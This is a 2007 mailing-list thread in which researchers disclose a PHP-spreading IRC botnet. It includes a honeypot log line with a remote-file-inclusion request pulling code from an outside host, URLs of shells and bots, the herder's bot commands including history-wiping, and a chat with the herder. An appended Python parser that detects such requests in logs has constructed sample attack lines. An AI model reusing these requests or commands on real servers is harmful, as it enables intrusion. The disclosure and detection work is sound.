To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
----------
List,
I already have access to a list of C&C servers, but there is a list that
I am missing. I'm very interested in getting a list of the IP addresses that
the bots themselves are connecting from, i.e.: what systems specifically did
they infect? Is there a way to get such a list?
On 3/21/07 2:03 PM, "David Vorel" <[EMAIL PROTECTED]> wrote:
>
> Hi all,
>
> nice shot Bodik ;] I found a different botnet on eu.undernet.org chan #vx8. It's a
> Linux zombie-based botnet that spreads through various bugs in PHP. Undernet
> admins please take a look at it. Description follows. Botnet herders are
> Denzel, xeQt, aslpls-.
>
>
> First attempt:
>
> 85.17.11.53 - - [20/Mar/2007:04:10:41 +0100] "GET
> /index.php?loc=http://nawader.org/modules/Top/kgb.c? HTTP/1.1" 200 132
> "-" "libwww-perl/5.79"
>
> We mirror all links included; the engine for RFI source is not completed
> yet, so for this time I send raw URLs.
>
> http://nawader.org/modules/Top/kgb.c
> http://www.honeynet.cz/bots/5249235d1476c24250130da98b9a34b5.txt
> - PHP shell which includes other links
>
> http://nawader.org/modules/Top/bc.txt
> http://www.honeynet.cz/bots/4456038f56e4b71b01ed0a348cbfeb41.txt
> - Backconnect shell
>
> http://nawader.org/modules/Top/n.txt
> http://www.honeynet.cz/bots/adc704f9697cdf89da9d503b11f9787d.txt
> - Shellbot I, connect to eu.undernet.org #vx8
>
> http://nawader.org/modules/Top/teamrx
> http://www.honeynet.cz/bots/68f984e9f37e3911b92493cbb9b04aef.txt
> - Loader for n.txt and bc.txt; runs backconnect and sends a shell to
> 220.232.137.199 and 64.38.11.130
>
>
> http://nawader.org/modules/Top/toyo.txt
> http://www.honeynet.cz/bots/80d97c973062d7d2d369f5f79578a597.txt
> - Shellbot II, connect to eu.undernet.org #vx8
>
>
>
> All scripts are labelled "xeQt vS TeaMrx".
>
> Who on chan:
>
> http://www.honeynet.cz/trash/list
>
> After a while on the channel, bot herders move bots to another chan.
>
> #vx8 :<@xeQt> !x !join #perljunkies aV5&bvhyI
> #vx8 :<@xeQt> !x !join #mp3fulls 209x5Vi.
>
>
>
> Here is the list from uname -sr.
>
> http://www.honeynet.cz/trash/uname
>
>
>
>
> chat:
>
> <crop>
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :im no geek i tould
>>> u
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :im a criminal
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :make shit
> << PRIVMSG #vx8 :i now that you are criminal
> << PRIVMSG #vx8 :but still on free ?
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :nothings free
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :$$
> << PRIVMSG xeQt :^AVERSION^A
>>> :[EMAIL PROTECTED] NOTICE nirgil :^AVERSION mIRC
>>> v6.17 Khaled Mardam-Bey^A
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :its my life
> << PRIVMSG #vx8 :jail is for free
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :i know
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :im going sooon
> << PRIVMSG #vx8 :y are waiting for ?
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :its full
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :a few months
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :im no murder, so i
>>> goto wait
> </crop>
>
> <crop>
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :thats a trickey one
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :cuz i dont touch
>>> any of the servers
> << PRIVMSG #vx8 :when u installed your script throught bug in php that's
> touching too
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 ::)))
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :i tould you
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :its magic
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :i dont connect to
>>> anything
> << PRIVMSG #vx8 :yes u did
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :no i didn't
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :all the bots do my
>>> job
> << PRIVMSG #vx8 :and that is ?
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :you know what mass
>>> spread is?
> << PRIVMSG #vx8 :<@xeQt> !x !join #perljunkies aV5&bvhyI
> << PRIVMSG #vx8 :and what about this ?
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :so?
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :how you get this ip
>>> address from that?
> << PRIVMSG #vx8 :this command is better one..
> << PRIVMSG #vx8 :<@xeQt> !x uname -sr
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :!x id
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :uid=33949(nucsaor)
>>> gid=33952(nucsaor) groups=33952(nucsaor)
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :uid=33(www-data)
>>> gid=33(www-data) groups=33(www-data)
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :like that?
>>> :[EMAIL PROTECTED] PRIVMSG #vx8
>>> :uid=80(www) gid=80(www) groups=80(www)
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :uid=80(www)
>>> gid=80(www) groups=80(www)
> << PRIVMSG #vx8 :yes, now you are in direct connect with these servers
> ..
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :i dont think you
>>> have no clue man
> << PRIVMSG #vx8 :thats the point of abuse ..
> << PRIVMSG #vx8 :these servers are yours ?
> << PRIVMSG #vx8 :or not ?
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :i understand your
>>> pissed off, but this is useless
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :call the cops, make
>>> them trace me... but its useless
> << PRIVMSG #vx8 :I think that all servers here are used to fraud ..
> << PRIVMSG #vx8 :i dont think so ..
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :!x unset HISTFILE
>>> HISTSAVE
> << PRIVMSG #vx8 :heh
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :o_0
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :i dont see how you
>>> get ip from that
> << PRIVMSG #vx8 :from what ?
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :David Hac?
> << PRIVMSG #vx8 :?
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :David Hac
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :man
> << PRIVMSG #vx8 :what ?
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :good luck hunting
>>> me
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :with feds
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :its useless
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :for sure
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :but do it.. i dont
>>> say no but.. goood luck
> << PRIVMSG #vx8 :i'm not hunting you, thats work for authorities.
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :yes
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :goood
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :i like a channelge
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :challenge
> << PRIVMSG #vx8 :so what for now ?
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :i dont need to
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :why wold i do that?
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :im the bitch, you
>>> the victum..
> << PRIVMSG #vx8 :i'm not victim ..
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :you hunt me
> << PRIVMSG #vx8 :others are victims ..
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :your right
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :you a cop?
> << PRIVMSG #vx8 :yes
> << PRIVMSG #vx8 :;]
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :and?
>>> :[EMAIL PROTECTED] NICK :CopKiller
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :what you gonna do
>>> about it?
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :call your friends,
>>> girlfriends....
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :cuz i dont give a
>>> fuck
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :here i kick cops
> << PRIVMSG #vx8 :so kick me dude ;]
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :dont need to
> << PRIVMSG #vx8 :heh
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :come here and ill
>>> show you
> << PRIVMSG #vx8 :i'm here
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :in my hoood
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :not mirc
> </crop>
>
> Cheers..
>
> David Vorel
>
> _______________________________________________
> To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
> All list and server information are public and available to law enforcement
> upon request.
> http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
--
Regards,
Adriel T. Desautels
Chief Technology Officer - Netragard, LLC
Office: 617-934-0269 || Mobile : 857-636-8882
http://www.linkedin.com/pub/1/118/a45
http://www.netragard.com
-------------------------
"We make IT secure."
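The first message asks where a list of the IPs the bots connect from could come from, and the quoted honeypot log line shows one source: each RFI attempt is logged with the source IP of an already-infected host and the URL of the staged bot code. The following is an added example, not code from either poster: a Python parser for Apache combined-format lines that flags include-by-URL requests, groups them by source IP and collects the staging hosts. The sample log lines, IPs and hostnames are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Apache "combined" format, the layout of the honeypot line quoted in the thread.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# User agents typical of scripted RFI scanners; libwww-perl is the one in the thread's log line.
SCANNER_UAS = ("libwww-perl",)

# Constructed sample lines (documentation IPs and .example hosts), not a real log.
SAMPLE_LOG = """\
192.0.2.10 - - [20/Mar/2007:04:10:41 +0100] "GET /index.php?loc=http://dropper.example/kgb.c? HTTP/1.1" 200 132 "-" "libwww-perl/5.79"
192.0.2.10 - - [20/Mar/2007:04:10:42 +0100] "GET /index.php?loc=http%3A%2F%2Fdropper.example%2Fbc.txt%3F HTTP/1.1" 200 132 "-" "libwww-perl/5.79"
198.51.100.7 - - [20/Mar/2007:05:00:00 +0100] "GET /index.php?loc=about HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [20/Mar/2007:05:01:13 +0100] "GET /page.php?inc=ftp://203.0.113.99/sh.txt HTTP/1.0" 404 210 "-" "Mozilla/4.0"
"""

def rfi_params(target):
    """Return (param, url) pairs whose value is an absolute URL (the include-by-URL shape of RFI)."""
    # parse_qsl percent-decodes, so an encoded http%3A%2F%2F prefix is caught as well.
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if re.match(r'(?:https?|ftp)://', value, re.I):
            hits.append((name, value))
    return hits

def analyze(lines):
    """Group RFI attempts by source IP (the compromised systems doing the spreading, which the
    first message asks about) and collect the hosts that serve the included code."""
    attempts = defaultdict(list)
    include_hosts = set()
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # not a combined-format line
        for param, url in rfi_params(m.group("target")):
            attempts[m.group("ip")].append({
                "param": param, "url": url, "status": int(m.group("status")),
                "scanner_ua": m.group("ua").startswith(SCANNER_UAS),
            })
            include_hosts.add(urlsplit(url).hostname)
    return dict(attempts), include_hosts

if __name__ == "__main__":
    attempts, hosts = analyze(SAMPLE_LOG.splitlines())
    print({ip: [h["url"] for h in hits] for ip, hits in attempts.items()}, sorted(hosts))
```

A 200 on such a request does not by itself show the include executed; as the thread shows, the bot appearing on the channel is the confirmation, so the status is kept only as context.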